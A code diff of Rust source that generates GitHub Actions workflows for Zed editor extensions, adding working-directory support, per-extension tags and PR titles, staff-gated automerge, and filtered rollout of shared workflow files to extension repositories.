@@ -39,16 +41,17 @@ pub(crate) fn extension_bump() -> Workflow {
&app_id,
&app_secret,
);
- let create_label = create_version_label(
+ let (create_label, tag) = create_version_label(
&dependencies,
&version_changed,
¤t_version,
&app_id,
&app_secret,
);
+ let tag = tag.as_job_output(&create_label);
let trigger_release = trigger_release(
&[&check_version_changed, &create_label],
- current_version,
+ tag,
&app_id,
&app_secret,
);
@@ -59,6 +62,7 @@ pub(crate) fn extension_bump() -> Workflow {
WorkflowCall::default()
.add_input(bump_type.name, bump_type.call_input())
.add_input(force_bump.name, force_bump.call_input())
+ .add_input(working_directory.name, working_directory.call_input())
.secrets([
(app_id.name.to_owned(), app_id.secret_configuration()),
(
@@ -68,7 +72,7 @@ pub(crate) fn extension_bump() -> Workflow {
]),
),
)
- .concurrency(one_workflow_per_non_main_branch())
+ .concurrency(one_workflow_per_non_main_branch_and_token("extension-bump"))
.add_env(("CARGO_TERM_COLOR", "always"))
.add_env(("RUST_BACKTRACE", 1))
.add_env(("CARGO_INCREMENTAL", 0))
@@ -82,10 +86,19 @@ pub(crate) fn extension_bump() -> Workflow {
.add_job(trigger_release.name, trigger_release.job)
}
+fn extension_job_defaults() -> Defaults {
+ Defaults::default().run(
+ RunDefaults::default()
+ .shell(BASH_SHELL)
+ .working_directory("${{ inputs.working-directory }}"),
+ )
+}
+
fn check_version_changed() -> (NamedJob, StepOutput, StepOutput) {
let (compare_versions, version_changed, current_version) = compare_versions();
let job = Job::default()
+ .defaults(extension_job_defaults())
.with_repository_owner_guard()
.outputs([
(version_changed.name.to_owned(), version_changed.to_string()),
@@ -108,25 +121,29 @@ fn create_version_label(
current_version: &JobOutput,
app_id: &WorkflowSecret,
app_secret: &WorkflowSecret,
-) -> NamedJob {
+) -> (NamedJob, StepOutput) {
let (generate_token, generated_token) =
generate_token(&app_id.to_string(), &app_secret.to_string(), None);
+ let (determine_tag_step, tag) = determine_tag(current_version);
let job = steps::dependant_job(dependencies)
+ .defaults(extension_job_defaults())
.cond(Expression::new(format!(
"{DEFAULT_REPOSITORY_OWNER_GUARD} && github.event_name == 'push' && \
github.ref == 'refs/heads/main' && {version_changed} == 'true'",
version_changed = version_changed_output.expr(),
)))
+ .outputs([(tag.name.to_owned(), tag.to_string())])
.runs_on(runners::LINUX_SMALL)
.timeout_minutes(1u32)
.add_step(generate_token)
.add_step(steps::checkout_repo())
- .add_step(create_version_tag(current_version, generated_token));
+ .add_step(determine_tag_step)
+ .add_step(create_version_tag(&tag, generated_token));
- named::job(job)
+ (named::job(job), tag)
}
-fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput) -> Step<Use> {
+fn create_version_tag(tag: &StepOutput, generated_token: StepOutput) -> Step<Use> {
named::uses("actions", "github-script", "v7").with(
Input::default()
.add(
@@ -135,7 +152,7 @@ fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput)
github.rest.git.createRef({{
owner: context.repo.owner,
repo: context.repo.repo,
- ref: 'refs/tags/v{current_version}',
+ ref: 'refs/tags/{tag}',
sha: context.sha
}})"#
},
@@ -144,6 +161,26 @@ fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput)
)
}
+fn determine_tag(current_version: &JobOutput) -> (Step<Run>, StepOutput) {
+ let step = named::bash(formatdoc! {r#"
+ EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')"
+
+ if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then
+ TAG="v${{CURRENT_VERSION}}"
+ else
+ TAG="${{EXTENSION_ID}}-v${{CURRENT_VERSION}}"
+ fi
+
+ echo "tag=${{TAG}}" >> "$GITHUB_OUTPUT"
+ "#})
+ .id("determine-tag")
+ .add_env(("CURRENT_VERSION", current_version.to_string()))
+ .add_env(("WORKING_DIR", "${{ inputs.working-directory }}"));
+
+ let tag = StepOutput::new(&step, "tag");
+ (step, tag)
+}
+
/// Compares the current and previous commit and checks whether versions changed inbetween.
pub(crate) fn compare_versions() -> (Step<Run>, StepOutput, StepOutput) {
let check_needs_bump = named::bash(formatdoc! {
@@ -153,8 +190,6 @@ pub(crate) fn compare_versions() -> (Step<Run>, StepOutput, StepOutput) {
if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then
PR_FORK_POINT="$(git merge-base origin/main HEAD)"
git checkout "$PR_FORK_POINT"
- elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then
- git checkout "$BRANCH_PARENT_SHA"
else
git checkout "$(git log -1 --format=%H)"~1
fi
@@ -187,21 +222,29 @@ fn bump_extension_version(
) -> NamedJob {
let (generate_token, generated_token) =
generate_token(&app_id.to_string(), &app_secret.to_string(), None);
- let (bump_version, new_version) = bump_version(current_version, bump_type);
+ let (bump_version, _new_version, title, body, branch_name) =
+ bump_version(current_version, bump_type);
let job = steps::dependant_job(dependencies)
+ .defaults(extension_job_defaults())
.cond(Expression::new(format!(
"{DEFAULT_REPOSITORY_OWNER_GUARD} &&\n({force_bump} == true || {version_changed} == 'false')",
force_bump = force_bump_output.expr(),
version_changed = version_changed_output.expr(),
)))
.runs_on(runners::LINUX_SMALL)
- .timeout_minutes(3u32)
+ .timeout_minutes(5u32)
.add_step(generate_token)
.add_step(steps::checkout_repo())
+ .add_step(cache_rust_dependencies_namespace())
.add_step(install_bump_2_version())
.add_step(bump_version)
- .add_step(create_pull_request(new_version, generated_token));
+ .add_step(create_pull_request(
+ title,
+ body,
+ generated_token,
+ branch_name,
+ ));
named::job(job)
}
@@ -256,7 +299,10 @@ fn install_bump_2_version() -> Step<Run> {
)
}
-fn bump_version(current_version: &JobOutput, bump_type: &WorkflowInput) -> (Step<Run>, StepOutput) {
+fn bump_version(
+ current_version: &JobOutput,
+ bump_type: &WorkflowInput,
+) -> (Step<Run>, StepOutput, StepOutput, StepOutput, StepOutput) {
let step = named::bash(formatdoc! {r#"
BUMP_FILES=("extension.toml")
if [[ -f "Cargo.toml" ]]; then
@@ -270,37 +316,60 @@ fn bump_version(current_version: &JobOutput, bump_type: &WorkflowInput) -> (Step
--no-configured-files "$BUMP_TYPE" "${{BUMP_FILES[@]}}"
if [[ -f "Cargo.toml" ]]; then
- cargo update --workspace
+ cargo +stable update --workspace
fi
NEW_VERSION="$({VERSION_CHECK})"
+ EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')"
+ EXTENSION_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')"
+
+ if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then
+ {{
+ echo "title=Bump version to ${{NEW_VERSION}}";
+ echo "body=This PR bumps the version of this extension to v${{NEW_VERSION}}";
+ echo "branch_name=zed-zippy-autobump";
+ }} >> "$GITHUB_OUTPUT"
+ else
+ {{
+ echo "title=${{EXTENSION_ID}}: Bump to v${{NEW_VERSION}}";
+ echo "body<<EOF";
+ echo "This PR bumps the version of the ${{EXTENSION_NAME}} extension to v${{NEW_VERSION}}.";
+ echo "";
+ echo "Release Notes:";
+ echo "";
+ echo "- N/A";
+ echo "EOF";
+ echo "branch_name=zed-zippy-${{EXTENSION_ID}}-autobump";
+ }} >> "$GITHUB_OUTPUT"
+ fi
echo "new_version=${{NEW_VERSION}}" >> "$GITHUB_OUTPUT"
"#
})
.id("bump-version")
.add_env(("OLD_VERSION", current_version.to_string()))
- .add_env(("BUMP_TYPE", bump_type.to_string()));
+ .add_env(("BUMP_TYPE", bump_type.to_string()))
+ .add_env(("WORKING_DIR", "${{ inputs.working-directory }}"));
let new_version = StepOutput::new(&step, "new_version");
- (step, new_version)
+ let title = StepOutput::new(&step, "title");
+ let body = StepOutput::new(&step, "body");
+ let branch_name = StepOutput::new(&step, "branch_name");
+ (step, new_version, title, body, branch_name)
}
-fn create_pull_request(new_version: StepOutput, generated_token: StepOutput) -> Step<Use> {
- let formatted_version = format!("v{new_version}");
-
+fn create_pull_request(
+ title: StepOutput,
+ body: StepOutput,
+ generated_token: StepOutput,
+ branch_name: StepOutput,
+) -> Step<Use> {
named::uses("peter-evans", "create-pull-request", "v7").with(
Input::default()
- .add("title", format!("Bump version to {new_version}"))
- .add(
- "body",
- format!("This PR bumps the version of this extension to {formatted_version}",),
- )
- .add(
- "commit-message",
- format!("Bump version to {formatted_version}"),
- )
- .add("branch", "zed-zippy-autobump")
+ .add("title", title.to_string())
+ .add("body", body.to_string())
+ .add("commit-message", title.to_string())
+ .add("branch", branch_name.to_string())
.add(
"committer",
"zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>",
@@ -315,7 +384,7 @@ fn create_pull_request(new_version: StepOutput, generated_token: StepOutput) ->
fn trigger_release(
dependencies: &[&NamedJob],
- version: JobOutput,
+ tag: JobOutput,
app_id: &WorkflowSecret,
app_secret: &WorkflowSecret,
) -> NamedJob {
@@ -326,14 +395,20 @@ fn trigger_release(
Some(extension_registry),
);
let (get_extension_id, extension_id) = get_extension_id();
+ let (release_action, pull_request_number) = release_action(extension_id, tag, &generated_token);
let job = dependant_job(dependencies)
+ .defaults(extension_job_defaults())
.with_repository_owner_guard()
.runs_on(runners::LINUX_SMALL)
.add_step(generate_token)
.add_step(checkout_repo())
.add_step(get_extension_id)
- .add_step(release_action(extension_id, version, generated_token));
+ .add_step(release_action)
+ .add_step(enable_automerge_if_staff(
+ pull_request_number,
+ generated_token,
+ ));
named::job(job)
}
@@ -354,14 +429,94 @@ fn get_extension_id() -> (Step<Run>, StepOutput) {
fn release_action(
extension_id: StepOutput,
- version: JobOutput,
+ tag: JobOutput,
+ generated_token: &StepOutput,
+) -> (Step<Use>, StepOutput) {
+ let step = named::uses(
+ "huacnlee",
+ "zed-extension-action",
+ "82920ff0876879f65ffbcfa3403589114a8919c6",
+ )
+ .id("extension-update")
+ .add_with(("extension-name", extension_id.to_string()))
+ .add_with(("push-to", "zed-industries/extensions"))
+ .add_with(("tag", tag.to_string()))
+ .add_env(("COMMITTER_TOKEN", generated_token.to_string()));
+
+ let pull_request_number = StepOutput::new(&step, "pull-request-number");
+
+ (step, pull_request_number)
+}
+
+fn enable_automerge_if_staff(
+ pull_request_number: StepOutput,
generated_token: StepOutput,
) -> Step<Use> {
- named::uses("huacnlee", "zed-extension-action", "v2")
- .add_with(("extension-name", extension_id.to_string()))
- .add_with(("push-to", "zed-industries/extensions"))
- .add_with(("tag", format!("v{version}")))
- .add_env(("COMMITTER_TOKEN", generated_token.to_string()))
+ named::uses("actions", "github-script", "v7")
+ .add_with(("github-token", generated_token.to_string()))
+ .add_with((
+ "script",
+ indoc! {r#"
+ const prNumber = process.env.PR_NUMBER;
+ if (!prNumber) {
+ console.log('No pull request number set, skipping automerge.');
+ return;
+ }
+
+ const author = process.env.GITHUB_ACTOR;
+ let isStaff = false;
+ try {
+ const response = await github.rest.teams.getMembershipForUserInOrg({
+ org: 'zed-industries',
+ team_slug: 'staff',
+ username: author
+ });
+ isStaff = response.data.state === 'active';
+ } catch (error) {
+ if (error.status !== 404) {
+ throw error;
+ }
+ }
+
+ if (!isStaff) {
+ console.log(`Actor ${author} is not a staff member, skipping automerge.`);
+ return;
+ }
+
+ // Assign staff member responsible for the bump
+ const pullNumber = parseInt(prNumber);
+
+ await github.rest.issues.addAssignees({
+ owner: 'zed-industries',
+ repo: 'extensions',
+ issue_number: pullNumber,
+ assignees: [author]
+ });
+ console.log(`Assigned ${author} to PR #${prNumber} in zed-industries/extensions`);
+
+ // Get the GraphQL node ID
+ const { data: pr } = await github.rest.pulls.get({
+ owner: 'zed-industries',
+ repo: 'extensions',
+ pull_number: pullNumber
+ });
+
+ await github.graphql(`
+ mutation($pullRequestId: ID!) {
+ enablePullRequestAutoMerge(input: { pullRequestId: $pullRequestId, mergeMethod: SQUASH }) {
+ pullRequest {
+ autoMergeRequest {
+ enabledAt
+ }
+ }
+ }
+ }
+ `, { pullRequestId: pr.node_id });
+
+ console.log(`Automerge enabled for PR #${prNumber} in zed-industries/extensions`);
+ "#},
+ ))
+ .add_env(("PR_NUMBER", pull_request_number.to_string()))
}
fn extension_workflow_secrets() -> (WorkflowSecret, WorkflowSecret) {
@@ -3,15 +3,13 @@ use indoc::indoc;
use crate::tasks::workflows::{
extension_bump::compare_versions,
- run_tests::{
- fetch_ts_query_ls, orchestrate_without_package_filter, run_ts_query_ls, tests_pass,
- },
+ run_tests::{fetch_ts_query_ls, orchestrate_for_extension, run_ts_query_ls, tests_pass},
runners,
steps::{
- self, CommonJobConditions, FluentBuilder, NamedJob, cache_rust_dependencies_namespace,
- named,
+ self, BASH_SHELL, CommonJobConditions, FluentBuilder, NamedJob,
+ cache_rust_dependencies_namespace, named,
},
- vars::{PathCondition, StepOutput, one_workflow_per_non_main_branch},
+ vars::{PathCondition, StepOutput, WorkflowInput, one_workflow_per_non_main_branch_and_token},
};
pub(crate) const ZED_EXTENSION_CLI_SHA: &str = "03d8e9aee95ea6117d75a48bcac2e19241f6e667";
@@ -25,8 +23,10 @@ pub(crate) fn extension_tests() -> Workflow {
let should_check_extension =
PathCondition::new("check_extension", r"^(extension\.toml|.*\.scm)$");
- let orchestrate =
- orchestrate_without_package_filter(&[&should_check_rust, &should_check_extension]);
+ let orchestrate = with_extension_defaults(orchestrate_for_extension(&[
+ &should_check_rust,
+ &should_check_extension,
+ ]));
let jobs = [
orchestrate,
@@ -34,11 +34,20 @@ pub(crate) fn extension_tests() -> Workflow {
should_check_extension.guard(check_extension()),
];
- let tests_pass = tests_pass(&jobs);
+ let tests_pass = tests_pass(&jobs, &[]);
+
+ let working_directory = WorkflowInput::string("working-directory", Some(".".to_owned()));
named::workflow()
- .add_event(Event::default().workflow_call(WorkflowCall::default()))
- .concurrency(one_workflow_per_non_main_branch())
+ .add_event(
+ Event::default().workflow_call(
+ WorkflowCall::default()
+ .add_input(working_directory.name, working_directory.call_input()),
+ ),
+ )
+ .concurrency(one_workflow_per_non_main_branch_and_token(
+ "extension-tests",
+ ))
.add_env(("CARGO_TERM_COLOR", "always"))
.add_env(("RUST_BACKTRACE", 1))
.add_env(("CARGO_INCREMENTAL", 0))
@@ -58,27 +67,66 @@ fn install_rust_target() -> Step<Run> {
named::bash(format!("rustup target add {EXTENSION_RUST_TARGET}",))
}
-fn run_clippy() -> Step<Run> {
- named::bash("cargo clippy --release --all-features -- --deny warnings")
+fn get_package_name() -> (Step<Run>, StepOutput) {
+ let step = named::bash(indoc! {r#"
+ PACKAGE_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < Cargo.toml | head -1 | tr -d '[:space:]')"
+ echo "package_name=${PACKAGE_NAME}" >> "$GITHUB_OUTPUT"
+ "#})
+ .id("get-package-name");
+
+ let output = StepOutput::new(&step, "package_name");
+ (step, output)
+}
+
+fn cargo_fmt_package(package_name: &StepOutput) -> Step<Run> {
+ named::bash(r#"cargo fmt -p "$PACKAGE_NAME" -- --check"#)
+ .add_env(("PACKAGE_NAME", package_name.to_string()))
+}
+
+fn run_clippy(package_name: &StepOutput) -> Step<Run> {
+ named::bash(r#"cargo clippy -p "$PACKAGE_NAME" --release --all-features -- --deny warnings"#)
+ .add_env(("PACKAGE_NAME", package_name.to_string()))
+}
+
+fn run_nextest(package_name: &StepOutput) -> Step<Run> {
+ named::bash(
+ r#"cargo nextest run -p "$PACKAGE_NAME" --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n 's|host: ||p')""#,
+ )
+ .add_env(("PACKAGE_NAME", package_name.to_string()))
+ .add_env(("NEXTEST_NO_TESTS", "warn"))
+}
+
+fn extension_job_defaults() -> Defaults {
+ Defaults::default().run(
+ RunDefaults::default()
+ .shell(BASH_SHELL)
+ .working_directory("${{ inputs.working-directory }}"),
+ )
+}
+
+fn with_extension_defaults(named_job: NamedJob) -> NamedJob {
+ NamedJob {
+ name: named_job.name,
+ job: named_job.job.defaults(extension_job_defaults()),
+ }
}
fn check_rust() -> NamedJob {
+ let (get_package, package_name) = get_package_name();
+
let job = Job::default()
+ .defaults(extension_job_defaults())
.with_repository_owner_guard()
.runs_on(runners::LINUX_LARGE_RAM)
.timeout_minutes(6u32)
.add_step(steps::checkout_repo())
.add_step(steps::cache_rust_dependencies_namespace())
.add_step(install_rust_target())
- .add_step(steps::cargo_fmt())
- .add_step(run_clippy())
+ .add_step(get_package)
+ .add_step(cargo_fmt_package(&package_name))
+ .add_step(run_clippy(&package_name))
.add_step(steps::cargo_install_nextest())
- .add_step(
- steps::cargo_nextest(runners::Platform::Linux)
- // Set the target to the current platform again
- .with_target("$(rustc -vV | sed -n 's|host: ||p')")
- .add_env(("NEXTEST_NO_TESTS", "warn")),
- );
+ .add_step(run_nextest(&package_name));
named::job(job)
}
@@ -88,6 +136,7 @@ pub(crate) fn check_extension() -> NamedJob {
let (check_version_job, version_changed, _) = compare_versions();
let job = Job::default()
+ .defaults(extension_job_defaults())
.with_repository_owner_guard()
.runs_on(runners::LINUX_LARGE_RAM)
.timeout_minutes(6u32)
@@ -124,8 +173,8 @@ pub fn download_zed_extension_cli(cache_hit: StepOutput) -> Step<Run> {
named::bash(
indoc! {
r#"
- wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension"
- chmod +x zed-extension
+ wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" -O "$GITHUB_WORKSPACE/zed-extension"
+ chmod +x "$GITHUB_WORKSPACE/zed-extension"
"#,
}
).if_condition(Expression::new(format!("{} != 'true'", cache_hit.expr())))
@@ -136,7 +185,7 @@ pub fn check() -> Step<Run> {
r#"
mkdir -p /tmp/ext-scratch
mkdir -p /tmp/ext-output
- ./zed-extension --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output
+ "$GITHUB_WORKSPACE/zed-extension" --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output
"#
})
}
@@ -6,46 +6,72 @@ use indoc::indoc;
use serde_json::json;
use crate::tasks::workflows::steps::CheckoutStep;
+use crate::tasks::workflows::steps::cache_rust_dependencies_namespace;
+use crate::tasks::workflows::vars::JobOutput;
use crate::tasks::workflows::{
extension_bump::{RepositoryTarget, generate_token},
runners,
steps::{self, DEFAULT_REPOSITORY_OWNER_GUARD, NamedJob, named},
- vars::{self, StepOutput},
+ vars::{self, StepOutput, WorkflowInput},
};
const ROLLOUT_TAG_NAME: &str = "extension-workflows";
+const WORKFLOW_ARTIFACT_NAME: &str = "extension-workflow-files";
pub(crate) fn extension_workflow_rollout() -> Workflow {
- let fetch_repos = fetch_extension_repos();
- let rollout_workflows = rollout_workflows_to_extension(&fetch_repos);
- let create_tag = create_rollout_tag(&rollout_workflows);
+ let filter_repos_input = WorkflowInput::string("filter-repos", Some(String::new()))
+ .description(
+ "Comma-separated list of repository names to rollout to. Leave empty for all repos.",
+ );
+ let extra_context_input = WorkflowInput::string("change-description", Some(String::new()))
+ .description("Description for the changes to be expected with this rollout");
+
+ let (fetch_repos, removed_ci, removed_shared) = fetch_extension_repos(&filter_repos_input);
+ let rollout_workflows = rollout_workflows_to_extension(
+ &fetch_repos,
+ removed_ci,
+ removed_shared,
+ &extra_context_input,
+ );
+ let create_tag = create_rollout_tag(&rollout_workflows, &filter_repos_input);
named::workflow()
- .on(Event::default().workflow_dispatch(WorkflowDispatch::default()))
+ .on(Event::default().workflow_dispatch(
+ WorkflowDispatch::default()
+ .add_input(filter_repos_input.name, filter_repos_input.input())
+ .add_input(extra_context_input.name, extra_context_input.input()),
+ ))
.add_env(("CARGO_TERM_COLOR", "always"))
.add_job(fetch_repos.name, fetch_repos.job)
.add_job(rollout_workflows.name, rollout_workflows.job)
.add_job(create_tag.name, create_tag.job)
}
-fn fetch_extension_repos() -> NamedJob {
- fn get_repositories() -> (Step<Use>, StepOutput) {
+fn fetch_extension_repos(filter_repos_input: &WorkflowInput) -> (NamedJob, JobOutput, JobOutput) {
+ fn get_repositories(filter_repos_input: &WorkflowInput) -> (Step<Use>, StepOutput) {
let step = named::uses("actions", "github-script", "v7")
.id("list-repos")
.add_with((
"script",
- indoc::indoc! {r#"
- const repos = await github.paginate(github.rest.repos.listForOrg, {
+ formatdoc! {r#"
+ const repos = await github.paginate(github.rest.repos.listForOrg, {{
org: 'zed-extensions',
type: 'public',
per_page: 100,
- });
+ }});
- const filteredRepos = repos
+ let filteredRepos = repos
.filter(repo => !repo.archived)
.map(repo => repo.name);
- console.log(`Found ${filteredRepos.length} extension repos`);
+ const filterInput = `{filter_repos_input}`.trim();
+ if (filterInput.length > 0) {{
+ const allowedNames = filterInput.split(',').map(s => s.trim()).filter(s => s.length > 0);
+ filteredRepos = filteredRepos.filter(name => allowedNames.includes(name));
+ console.log(`Filter applied. Matched ${{filteredRepos.length}} repos from ${{allowedNames.length}} requested.`);
+ }}
+
+ console.log(`Found ${{filteredRepos.length}} extension repos`);
return filteredRepos;
"#},
))
@@ -56,36 +82,12 @@ fn fetch_extension_repos() -> NamedJob {
(step, filtered_repos)
}
- let (get_org_repositories, list_repos_output) = get_repositories();
-
- let job = Job::default()
- .cond(Expression::new(format!(
- "{DEFAULT_REPOSITORY_OWNER_GUARD} && github.ref == 'refs/heads/main'"
- )))
- .runs_on(runners::LINUX_SMALL)
- .timeout_minutes(5u32)
- .outputs([("repos".to_owned(), list_repos_output.to_string())])
- .add_step(get_org_repositories);
-
- named::job(job)
-}
-
-fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
fn checkout_zed_repo() -> CheckoutStep {
steps::checkout_repo()
.with_full_history()
- .with_path("zed")
.with_custom_name("checkout_zed_repo")
}
- fn checkout_extension_repo(token: &StepOutput) -> CheckoutStep {
- steps::checkout_repo()
- .with_custom_name("checkout_extension_repo")
- .with_token(token)
- .with_repository("zed-extensions/${{ matrix.repo }}")
- .with_path("extension")
- }
-
fn get_previous_tag_commit() -> (Step<Run>, StepOutput) {
let step = named::bash(formatdoc! {r#"
PREV_COMMIT=$(git rev-parse "{ROLLOUT_TAG_NAME}^{{commit}}" 2>/dev/null || echo "")
@@ -96,49 +98,127 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
echo "Found previous rollout at commit: $PREV_COMMIT"
echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT"
"#})
- .id("prev-tag")
- .working_directory("zed");
+ .id("prev-tag");
let step_output = StepOutput::new(&step, "prev_commit");
(step, step_output)
}
- fn get_removed_files(prev_commit: &StepOutput) -> (Step<Run>, StepOutput) {
- let step = named::bash(indoc::indoc! {r#"
- if [ "$MATRIX_REPO" = "workflows" ]; then
- WORKFLOW_DIR="extensions/workflows"
- else
- WORKFLOW_DIR="extensions/workflows/shared"
- fi
-
- echo "Calculating changes from $PREV_COMMIT to HEAD for $WORKFLOW_DIR"
+ fn get_removed_files(prev_commit: &StepOutput) -> (Step<Run>, StepOutput, StepOutput) {
+ let step = named::bash(indoc! {r#"
+ for workflow_type in "ci" "shared"; do
+ if [ "$workflow_type" = "ci" ]; then
+ WORKFLOW_DIR="extensions/workflows"
+ else
+ WORKFLOW_DIR="extensions/workflows/shared"
+ fi
+
+ REMOVED=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \
+ awk '/^D/ { print $2 } /^R/ { print $2 }' | \
+ xargs -I{} basename {} 2>/dev/null | \
+ tr '\n' ' ' || echo "")
+ REMOVED=$(echo "$REMOVED" | xargs)
+
+ echo "Removed files for $workflow_type: $REMOVED"
+ echo "removed_${workflow_type}=$REMOVED" >> "$GITHUB_OUTPUT"
+ done
+ "#})
+ .id("calc-changes")
+ .add_env(("PREV_COMMIT", prev_commit.to_string()));
- # Get deleted files (status D) and renamed files (status R - old name needs removal)
- # Using -M to detect renames, then extracting files that are gone from their original location
- REMOVED_FILES=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \
- awk '/^D/ { print $2 } /^R/ { print $2 }' | \
- xargs -I{} basename {} 2>/dev/null | \
- tr '\n' ' ' || echo "")
+ // These are created in the for-loop above and thus do exist
+ let removed_ci = StepOutput::new_unchecked(&step, "removed_ci");
+ let removed_shared = StepOutput::new_unchecked(&step, "removed_shared");
- REMOVED_FILES=$(echo "$REMOVED_FILES" | xargs)
+ (step, removed_ci, removed_shared)
+ }
- echo "Files to remove: $REMOVED_FILES"
- echo "removed_files=$REMOVED_FILES" >> "$GITHUB_OUTPUT"
+ fn generate_workflow_files() -> Step<Run> {
+ named::bash(indoc! {r#"
+ cargo xtask workflows "$COMMIT_SHA"
"#})
- .id("calc-changes")
- .working_directory("zed")
- .add_env(("PREV_COMMIT", prev_commit.to_string()))
- .add_env(("MATRIX_REPO", "${{ matrix.repo }}"));
+ .add_env(("COMMIT_SHA", "${{ github.sha }}"))
+ }
- let removed_files = StepOutput::new(&step, "removed_files");
+ fn upload_workflow_files() -> Step<Use> {
+ named::uses(
+ "actions",
+ "upload-artifact",
+ "330a01c490aca151604b8cf639adc76d48f6c5d4", // v5
+ )
+ .add_with(("name", WORKFLOW_ARTIFACT_NAME))
+ .add_with(("path", "extensions/workflows/**/*.yml"))
+ .add_with(("if-no-files-found", "error"))
+ }
- (step, removed_files)
+ let (get_org_repositories, list_repos_output) = get_repositories(filter_repos_input);
+ let (get_prev_tag, prev_commit) = get_previous_tag_commit();
+ let (calc_changes, removed_ci, removed_shared) = get_removed_files(&prev_commit);
+
+ let job = Job::default()
+ .cond(Expression::new(format!(
+ "{DEFAULT_REPOSITORY_OWNER_GUARD} && github.ref == 'refs/heads/main'"
+ )))
+ .runs_on(runners::LINUX_SMALL)
+ .timeout_minutes(10u32)
+ .outputs([
+ ("repos".to_owned(), list_repos_output.to_string()),
+ ("prev_commit".to_owned(), prev_commit.to_string()),
+ ("removed_ci".to_owned(), removed_ci.to_string()),
+ ("removed_shared".to_owned(), removed_shared.to_string()),
+ ])
+ .add_step(checkout_zed_repo())
+ .add_step(get_prev_tag)
+ .add_step(calc_changes)
+ .add_step(get_org_repositories)
+ .add_step(cache_rust_dependencies_namespace())
+ .add_step(generate_workflow_files())
+ .add_step(upload_workflow_files());
+
+ let job = named::job(job);
+ let (removed_ci, removed_shared) = (
+ removed_ci.as_job_output(&job),
+ removed_shared.as_job_output(&job),
+ );
+
+ (job, removed_ci, removed_shared)
+}
+
+fn rollout_workflows_to_extension(
+ fetch_repos_job: &NamedJob,
+ removed_ci: JobOutput,
+ removed_shared: JobOutput,
+ extra_context_input: &WorkflowInput,
+) -> NamedJob {
+ fn checkout_extension_repo(token: &StepOutput) -> CheckoutStep {
+ steps::checkout_repo()
+ .with_custom_name("checkout_extension_repo")
+ .with_token(token)
+ .with_repository("zed-extensions/${{ matrix.repo }}")
+ .with_path("extension")
+ }
+
+ fn download_workflow_files() -> Step<Use> {
+ named::uses(
+ "actions",
+ "download-artifact",
+ "018cc2cf5baa6db3ef3c5f8a56943fffe632ef53", // v6.0.0
+ )
+ .add_with(("name", WORKFLOW_ARTIFACT_NAME))
+ .add_with(("path", "workflow-files"))
}
- fn sync_workflow_files(removed_files: &StepOutput) -> Step<Run> {
- named::bash(indoc::indoc! {r#"
+ fn sync_workflow_files(removed_ci: JobOutput, removed_shared: JobOutput) -> Step<Run> {
+ named::bash(indoc! {r#"
mkdir -p extension/.github/workflows
+
+ if [ "$MATRIX_REPO" = "workflows" ]; then
+ REMOVED_FILES="$REMOVED_CI"
+ else
+ REMOVED_FILES="$REMOVED_SHARED"
+ fi
+
cd extension/.github/workflows
if [ -n "$REMOVED_FILES" ]; then
@@ -152,40 +232,46 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
cd - > /dev/null
if [ "$MATRIX_REPO" = "workflows" ]; then
- cp zed/extensions/workflows/*.yml extension/.github/workflows/
+ cp workflow-files/*.yml extension/.github/workflows/
else
- cp zed/extensions/workflows/shared/*.yml extension/.github/workflows/
+ cp workflow-files/shared/*.yml extension/.github/workflows/
fi
"#})
- .add_env(("REMOVED_FILES", removed_files.to_string()))
+ .add_env(("REMOVED_CI", removed_ci))
+ .add_env(("REMOVED_SHARED", removed_shared))
.add_env(("MATRIX_REPO", "${{ matrix.repo }}"))
}
fn get_short_sha() -> (Step<Run>, StepOutput) {
- let step = named::bash(indoc::indoc! {r#"
- echo "sha_short=$(git rev-parse --short=7 HEAD)" >> "$GITHUB_OUTPUT"
+ let step = named::bash(indoc! {r#"
+ echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT"
"#})
- .id("short-sha")
- .working_directory("zed");
+ .id("short-sha");
let step_output = StepOutput::new(&step, "sha_short");
(step, step_output)
}
- fn create_pull_request(token: &StepOutput, short_sha: &StepOutput) -> Step<Use> {
+ fn create_pull_request(
+ token: &StepOutput,
+ short_sha: &StepOutput,
+ context_input: &WorkflowInput,
+ ) -> Step<Use> {
let title = format!("Update CI workflows to `{short_sha}`");
+ let body = formatdoc! {r#"
+ This PR updates the CI workflow files from the main Zed repository
+ based on the commit zed-industries/zed@${{{{ github.sha }}}}
+
+ {context_input}
+ "#,
+ };
+
named::uses("peter-evans", "create-pull-request", "v7")
.add_with(("path", "extension"))
.add_with(("title", title.clone()))
- .add_with((
- "body",
- indoc::indoc! {r#"
- This PR updates the CI workflow files from the main Zed repository
- based on the commit zed-industries/zed@${{ github.sha }}
- "#},
- ))
+ .add_with(("body", body))
.add_with(("commit-message", title))
.add_with(("branch", "update-workflows"))
.add_with((
